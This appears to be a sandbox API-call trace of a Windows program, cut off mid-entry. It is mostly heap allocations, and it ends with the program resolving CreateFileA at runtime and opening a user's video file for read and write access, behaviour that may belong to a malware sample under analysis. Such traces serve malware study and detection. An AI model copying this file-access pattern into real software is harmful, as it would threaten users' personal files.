[0043.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.363] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.366] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.368] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c8c8 [0043.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c8c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.368] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8c8 [0043.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c8c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.369] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0043.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x48) returned 0x88e138 [0043.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv", cchWideChar=72, lpMultiByteStr=0x88e138, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv", lpUsedDefaultChar=0x0) returned 72 [0043.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0043.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.370] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\9qof4ezmoy.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=72, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0043.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=72, lpWideCharStr=0x7c38b0, cchWideChar=72 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv") returned 72 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, 